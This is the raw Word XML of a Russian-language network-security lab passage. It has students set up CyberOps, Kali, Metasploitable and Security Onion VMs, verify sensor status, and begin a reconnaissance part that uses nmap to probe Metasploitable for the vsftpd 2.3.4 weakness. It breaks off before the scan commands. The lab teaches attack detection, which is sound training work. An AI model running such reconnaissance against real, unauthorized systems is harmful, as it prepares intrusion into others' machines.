        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B12758">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6036AC1F" wp14:editId="6F866D7E">
            <wp:extent cx="5029200" cy="3297341"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Picture 3" descr="Screenshot of the CyberOps Workstation Settings with Network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4838" w14:textId="24FA3580" w:rsidR="00B12758" w:rsidRDefault="00464B9B" w:rsidP="00B12758">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t>Запустите виртуальные машины CyberOps Workstation, Kali, Metasploitable</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>Security Onion</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>войдите на них</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>систему.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F47827" w14:textId="4214AF6B" w:rsidR="00E06C7C" w:rsidRPr="00B12758" w:rsidRDefault="00464B9B" w:rsidP="00E06C7C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>В виртуальной машине CyberOps Workstation откройте терминал</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">настройте сеть, выполнив сценарий </w:t>
      </w:r>
      <w:r w:rsidR="00E06C7C" w:rsidRPr="00B12758">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>configure_as_static.sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B275B2" w14:textId="77777777" w:rsidR="00E06C7C" w:rsidRPr="00B12758" w:rsidRDefault="00E06C7C" w:rsidP="00E06C7C">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Поскольку сценарий требует прав суперпользователя, введите пароль для пользователя </w:t>
      </w:r>
      <w:r w:rsidRPr="00B12758">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>analyst</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D59D527" w14:textId="1CE900C6" w:rsidR="00E06C7C" w:rsidRPr="008855F4" w:rsidRDefault="00E06C7C" w:rsidP="00E06C7C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>analyst@secOps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>~]$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./lab.support.files/scripts/configure_as_static.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2B624C" w14:textId="77777777" w:rsidR="00464B9B" w:rsidRPr="008855F4" w:rsidRDefault="00464B9B" w:rsidP="00464B9B">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r>
        <w:t>пароль</w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> analyst: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D66F74A" w14:textId="77777777" w:rsidR="00464B9B" w:rsidRPr="008855F4" w:rsidRDefault="00464B9B" w:rsidP="00464B9B">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Configuring the NIC as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2229D17D" w14:textId="77777777" w:rsidR="00464B9B" w:rsidRPr="008855F4" w:rsidRDefault="00464B9B" w:rsidP="00464B9B">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IP: 192.168.0.11/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395668C6" w14:textId="77777777" w:rsidR="00464B9B" w:rsidRPr="008855F4" w:rsidRDefault="00464B9B" w:rsidP="00464B9B">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GW: 192.168.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FE4EE5" w14:textId="77777777" w:rsidR="00464B9B" w:rsidRPr="008855F4" w:rsidRDefault="00464B9B" w:rsidP="00464B9B">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31256E4D" w14:textId="77777777" w:rsidR="00464B9B" w:rsidRPr="008855F4" w:rsidRDefault="00464B9B" w:rsidP="00464B9B">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IP Configuration successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E43A6B" w14:textId="677C454D" w:rsidR="00E06C7C" w:rsidRPr="00E06C7C" w:rsidRDefault="00E06C7C" w:rsidP="00464B9B">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>[analyst@secOps ~]$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDF6F02" w14:textId="59C7DA12" w:rsidR="00894459" w:rsidRDefault="00894459" w:rsidP="00894459">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В виртуальной машине Security Onion щелкните правой кнопкой мыши </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Desktop &gt; Open Terminal Here (Рабочий стол &gt; Открыть терминал здесь)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Введите команду </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sudo service nsm status</w:t>
      </w:r>
      <w:r>
        <w:t>, чтобы убедиться, что все серверы</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>датчики готовы</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> к </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">работе. Этот процесс может занять некоторое время. Если некоторые службы отправляют сообщение </w:t>
      </w:r>
      <w:r w:rsidR="00E60D5A" w:rsidRPr="00E60D5A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FAIL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, повторяйте эту команду до тех пор, пока все статусы не примут значение </w:t>
      </w:r>
      <w:r w:rsidRPr="00E60D5A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r>
        <w:t>, после чего перейдите</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> к </w:t>
      </w:r>
      <w:r>
        <w:t>следующей части.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B28DCB" w14:textId="77777777" w:rsidR="00894459" w:rsidRPr="008855F4" w:rsidRDefault="00894459" w:rsidP="00CB6A88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analyst@SecOnion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">:~/Desktop$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nsm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E61948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Status: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>securityonion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D649B7A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* </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sguil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> server </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[  OK</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AD5344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>Status: HIDS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F60172C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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  * </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ossec_agent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sguil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[  OK</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7465A0B0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>Status: Bro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D2787E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Name         Type    Host             Status    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    Started</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A658405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manager      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>manager</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> localhost        running   5577   26 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Jun  10:04:27</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="43866C3D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proxy        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>proxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   localhost        running   5772   26 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Jun</w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4" w:rsidDel="0009400D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10:04:29</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="16F33163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seconion-eth0-1 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>worker  localhost</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        running   6245   26 Jun</w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4" w:rsidDel="0009400D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10:04:33</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABA528C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seconion-eth1-1 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>worker  localhost</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        running   6247   26 Jun</w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4" w:rsidDel="0009400D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10:04:33</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FD8573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seconion-eth2-1 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>worker  localhost</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        running   6246   26 Jun</w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4" w:rsidDel="0009400D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10:04:33</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F55649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>Status: seconion-eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFBE943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* </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>netsniff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-ng (full packet data) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[  OK</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213098C4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* </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pcap_agent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sguil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[  OK</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6061608E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* snort_agent-1 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sguil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[  OK</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C2211F" w14:textId="77777777" w:rsidR="008855F4" w:rsidRDefault="008855F4" w:rsidP="008855F4">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>* snort-1 (alert data) [  OK  ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31812196" w14:textId="3C7D6D91" w:rsidR="00894459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* barnyard2-1 (spooler, unified2 format) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[  OK</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F25155" w14:textId="77777777" w:rsidR="00894459" w:rsidRDefault="00894459" w:rsidP="00894459">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;output omitted&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CED3AB" w14:textId="23A40DD6" w:rsidR="00816E4A" w:rsidRDefault="00755DE4" w:rsidP="00816E4A">
      <w:pPr>
        <w:pStyle w:val="PartHead"/>
      </w:pPr>
      <w:r>
        <w:t>Разведывательная атака</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B38F00" w14:textId="44DA6843" w:rsidR="005914BC" w:rsidRPr="005914BC" w:rsidRDefault="005914BC" w:rsidP="005914BC">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В этой части вы будете использовать </w:t>
      </w:r>
      <w:r w:rsidRPr="00464B9B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r>
        <w:t>, чтобы определить, нет ли на виртуальной машине Metasploitable уязвимостей, связанных</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">программой </w:t>
      </w:r>
      <w:r w:rsidR="00B16DD4" w:rsidRPr="00464B9B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> версии 2.3.4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5DB2C7" w14:textId="5E472F59" w:rsidR="00924EA5" w:rsidRDefault="00652644" w:rsidP="00924EA5">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">На виртуальной машине Security Onion введите </w:t>
      </w:r>
      <w:r w:rsidR="00924EA5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>, чтобы вывести на экран дату</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>время.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F184B82" w14:textId="0DCDCDD2" w:rsidR="00924EA5" w:rsidRPr="00924EA5" w:rsidRDefault="00924EA5" w:rsidP="00924EA5">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">analyst@SecOnion:~/Desktop$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00924EA5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312F8C0B" w14:textId="57CA499E" w:rsidR="00924EA5" w:rsidRDefault="00924EA5" w:rsidP="00924EA5">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
      </w:pPr>
      <w:r>
        <w:t>Запишите свои дату</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>время.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081C5E9C" w14:textId="0B5DB13A" w:rsidR="00924EA5" w:rsidRPr="001660F4" w:rsidRDefault="001660F4" w:rsidP="00924EA5">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fri Apr 154= 19.10 UTC 2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039B3113" w14:textId="46F686A7" w:rsidR="001F4A07" w:rsidRDefault="00AF4E07" w:rsidP="009A4690">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">На виртуальной машине </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> щелкните правой кнопкой мыши по рабочему столу</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">выберите </w:t>
      </w:r>
      <w:r w:rsidR="00F149DD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Open Terminal (Открыть терминал)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6761515A" w14:textId="3E6B39AF" w:rsidR="00464B9B" w:rsidRDefault="006B49A6" w:rsidP="009A4690">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">С помощью параметров команды </w:t>
      </w:r>
      <w:r w:rsidRPr="00054E98">
        <w:rPr>
          <w:b/>
        </w:rPr>
